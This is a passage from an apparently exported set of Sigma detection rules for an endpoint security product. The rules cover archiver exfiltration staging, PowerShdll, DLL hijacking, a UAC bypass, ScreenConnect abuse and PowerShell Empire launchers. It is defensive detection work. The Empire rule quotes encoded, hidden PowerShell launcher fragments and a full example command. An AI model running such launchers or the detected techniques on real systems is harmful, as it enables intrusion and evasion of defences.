Micro\\Security Server\\PCCSRV\\Pccnt\\Common\\7z.exe'\n - '?:\\Trend Micro\\Security Server\\PCCSRV\\Pccnt\\Common\\7z.exe'\n CommandLine|contains|all:\n - '\\Security Server\\PCCSRV\\pccnt\\common\\7z.exe a -y ?:\\Windows\\TEMP\\\\????????-????-????-????-????????????.7z ?:\\Windows\\TEMP\\\\????????-????-????-????-????????????.7z*'\n - '-mhe=on -mhc=on'\n ParentCommandLine:\n - '?:\\Program Files (x86)\\Trend Micro\\Security Server\\PCCSRV\\\\Web\\Service\\OfcAutoUpdate.exe'\n - '?:\\Trend 
Micro\\Security Server\\PCCSRV\\\\Web\\Service\\OfcAutoUpdate.exe'\n\n exclusion_manageengine1:\n Image: '*\\7za.exe'\n ParentCommandLine:\n - '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n - '*;?:\\Program Files\\ManageEngine\\PMP\\scripts\\\\..\\lib\\conf.jar*'\n GrandparentImage:\n - '*\\bin\\wrapper.exe'\n - '?:\\Windows\\system32\\cmd.exe'\n exclusion_manageengine2:\n Image: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\7z.exe'\n ProcessParentOriginalFileName:\n - 'dcmsghandler.exe'\n - 'dcpatchprompt.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ZOHO Corporation Private Limited'\n\n # https://www.elisath.fr/\n exclusion_elisath:\n Image: '?:\\Elisath\\Gestion\\7za.exe'\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_lgn:\n Image: '?:\\Program Files\\7-Zip\\7z.exe'\n ParentCommandLine:\n - 'Powershell.exe -command import-module Lgpn;Lgpn-Backup'\n - 'Powershell.exe -command import-module Lgpn;Lgpn-Purge-Logs'\n\n exclusion_schedule:\n - ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_axiell:\n GrandparentCommandLine:\n - 'cache -c j -s ?:\\\\*\\mgr'\n - 'irisdb -c j -s ?:\\\\*\\mgr'\n\n condition: (1 of selection_application_*) and selection_parameters and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2eb031e-a992-4f43-8940-718b51c05cb9",
"rule_name": "Archiver Tool Execution with Suspicious Arguments",
"rule_description": "Detects when a common archiver tool, such as 7-Zip or WinRAR, is used with suspicious arguments, such as wiping files after archiving, encrypting the archive or selecting files by modification date.\nThese parameters have been used by threat actors to stage data for exfiltration and to delete the originals afterwards.\nThe argument patterns are prefix matches (for example -p* and -tb*), so unrelated options sharing a prefix, such as 7-Zip's -tbzip, can also match; this is why the rule carries a weak confidence and a number of vendor-specific exclusions.\nIt is recommended to investigate this behavior to determine whether the archiver is being used on sensitive data and whether the resulting archive left the host.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d32f5398-f83d-494f-b0e1-f47d051be155",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608547Z",
"creation_date": "2026-03-23T11:45:34.608550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/p3nt4/PowerShdll",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1059_001_powershell_script_execution_through_powershdll.yml",
"content": "title: PowerShell Script Execution via Powershdll\nid: d32f5398-f83d-494f-b0e1-f47d051be155\ndescription: |\n Detects the execution of a PowerShell script through the Powershdll evasion tool.\n Attackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\n It is recommended to investigate the content of the PowerShell script to determine whether this action was legitimate.\nreferences:\n - https://github.com/p3nt4/PowerShdll\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/10/11\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Powershdll.exe'\n - OriginalFileName: 'PowerShdll.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d32f5398-f83d-494f-b0e1-f47d051be155",
"rule_name": "PowerShell Script Execution via Powershdll",
"rule_description": "Detects the execution of a PowerShell script through the PowerShdll evasion tool.\nAttackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures that key on powershell.exe.\nDetection relies on the process image name ending in Powershdll.exe or on the PE OriginalFileName being PowerShdll.exe, so a renamed build with a stripped or altered version resource is not covered by this rule.\nIt is recommended to investigate the content of the PowerShell script to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-10-11",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d346505b-2afc-4531-a065-cd4f5c25f675",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591282Z",
"creation_date": "2026-03-23T11:45:34.591286Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591293Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_muiunattend.yml",
"content": "title: DLL Hijacking via muiunattend.exe\nid: d346505b-2afc-4531-a065-cd4f5c25f675\ndescription: |\n Detects potential Windows DLL Hijacking via muiunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'muiunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\SspiCli.dll'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d346505b-2afc-4531-a065-cd4f5c25f675",
"rule_name": "DLL Hijacking via muiunattend.exe",
"rule_description": "Detects potential Windows DLL hijacking via muiunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by placing a malicious DLL alongside the victim application.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule alerts when this binary loads dbgcore.dll, dbghelp.dll, SspiCli.dll or wdscore.dll from outside System32, SysWOW64 or WinSxS and the library is not signed by Microsoft Windows; executions of the binary itself from those system directories are also filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d351b415-d2e7-41f4-8e40-a52d8107de1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070494Z",
"creation_date": "2026-03-23T11:45:34.070498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_credwiz.yml",
"content": "title: Credwiz.exe Sacrificial Process Spawned\nid: d351b415-d2e7-41f4-8e40-a52d8107de1e\ndescription: |\n Detects the suspicious execution of the legitimate credwiz.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the credwiz.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\credwiz.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d351b415-d2e7-41f4-8e40-a52d8107de1e",
"rule_name": "Credwiz.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate credwiz.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, an information stealer distributed mostly via malicious Google advertisements.\nThe rule matches the exact command line ?:\\Windows\\System32\\credwiz.exe and filters launches whose parent is explorer.exe or sihost.exe, so interactive user launches are not reported.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the credwiz.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d38af30f-2fd9-4957-b4a8-1c40a7b0868a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077602Z",
"creation_date": "2026-03-23T11:45:34.077604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077608Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_powrprof.yml",
"content": "title: UAC Bypass Executed via powrprof\nid: d38af30f-2fd9-4957-b4a8-1c40a7b0868a\ndescription: |\n Detects the powrprof.dll DLL hijacking UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\sysprep\\'\n ImageLoaded|endswith: '\\powrprof.dll'\n\n filter_microsoft:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n filter_no_info:\n - ImageSize: -1\n - ImageLoaded|startswith: '\\Windows\\' # image starts with \\windows\\ instead of ?:\\windows, so no info possible\n\n exclusion_known_good:\n sha256:\n - 'd926530c659ddaf80770663f46f1efd94ffb4aab475c4e3367cb531af4a734e1' # powrprof.dll version 6.1.7600.16385 (win7_rtm.090713-1255)\n - 'efcd0b1d1afe33b2ebe94dc4d3aaab0b0e6de4f47bc2f9fa873dfac161bb2aac' # powrprof.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - 'bc710052925f7db190df51474725c41cae839c8a810c93b43edda98d33499fe2' # powrprof.dll version 10.0.22621.2361 (WinBuild.160101.0800)\n - '9592b7b12bed6f60ca92883b652afb7bf37d369e9f9a577583d68392b100491b' # powrprof.dll version 10.0.19041.3570 
(WinBuild.160101.0800)\n\n exclusion_legitimate:\n ImageLoaded:\n - '?:\\Windows\\SysWOW64\\powrprof.dll'\n - '?:\\Windows\\system32\\powrprof.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d38af30f-2fd9-4957-b4a8-1c40a7b0868a",
"rule_name": "UAC Bypass Executed via powrprof",
"rule_description": "Detects the powrprof.dll DLL hijacking UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the responsible process and user session to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d39ad600-7c50-41ca-aedb-35a550b25c79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089175Z",
"creation_date": "2026-03-23T11:45:34.089178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089182Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/insomniacs/analysis-walkthrough-fun-clientrun-part-1-b2509344ebe6",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_outlook.yml",
"content": "title: DLL Hijacking via Outlook.exe\nid: d39ad600-7c50-41ca-aedb-35a550b25c79\ndescription: |\n Detects potential Windows DLL Hijacking via Outlook.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://medium.com/insomniacs/analysis-walkthrough-fun-clientrun-part-1-b2509344ebe6\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Outlook.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\outllib.dll'\n - '\\rsaenh.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\Root\\OFFICE*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft 
Office\\OFFICE*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\OFFICE*\\'\n - '?:\\Program Files\\Microsoft Office\\Root\\OFFICE*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n condition: selection and not 1 of filter_*\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d39ad600-7c50-41ca-aedb-35a550b25c79",
"rule_name": "DLL Hijacking via Outlook.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Outlook.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3ad8869-3c7f-431b-ac23-e8f896fc81f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603440Z",
"creation_date": "2026-03-23T11:45:34.603444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603452Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1219_002_screenconnect_command_via_cmd.yml",
"content": "title: Windows Shell Command Executed via ScreenConnect\nid: d3ad8869-3c7f-431b-ac23-e8f896fc81f1\ndescription: |\n Detects a command execution through ScreenConnect, a legitimate remote access tool that can be used by attackers as an initial access or C2 vector.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate this command to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - attack.execution\n - attack.t1059.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\TEMP\\ScreenConnect\\\\*run.cmd'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3ad8869-3c7f-431b-ac23-e8f896fc81f1",
"rule_name": "Windows Shell Command Executed via ScreenConnect",
"rule_description": "Detects command execution through ScreenConnect, a legitimate remote access tool that attackers can use as an initial access or C2 vector.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate this command to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3f304b8-1e9a-4470-9285-7d649bfba41d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073322Z",
"creation_date": "2026-03-23T11:45:34.073324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073328Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BC-SECURITY/Empire/"
],
"name": "t1059_001_empire_powershell_launcher.yml",
"content": "title: PowerShell Empire Launcher Detected\nid: d3f304b8-1e9a-4470-9285-7d649bfba41d\ndescription: |\n Detects a PowerShell command-line containing arguments that are related to Empire Attack Framework launcher.\n Attackers may use Empire to maintain access to a compromised system.\n It is recommended to the newly created process for any suspicious activities.\nreferences:\n - https://github.com/BC-SECURITY/Empire/\ndate: 2020/09/29\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0363\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Empire\n - classification.Windows.Script.PowerShell\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_2:\n CommandLine|contains:\n - '-noP -sta -w 1 -enc'\n - '-NoP -NonI -W Hidden -enc'\n - '-NoP -sta -NonI -W Hidden'\n # \"SQBmAC... which decodes to If($PSVErSIONTaBLe.PSVERsIOn.MaJor -GE 3 in UTF16 ('I\\x00f\\x00(\\x00...'')\n # match on the beginning only\n - ' -enc SQBmACgAJA'\n - ' -enc SQBmACgAJA'\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x=$((gp HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x\"\n - 'powershell -Win Hidden -enc ?x'\n # Match on IEX\n - '-nop -exec bypass -EncodedCommand SQBFAFgA'\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3f304b8-1e9a-4470-9285-7d649bfba41d",
"rule_name": "PowerShell Empire Launcher Detected",
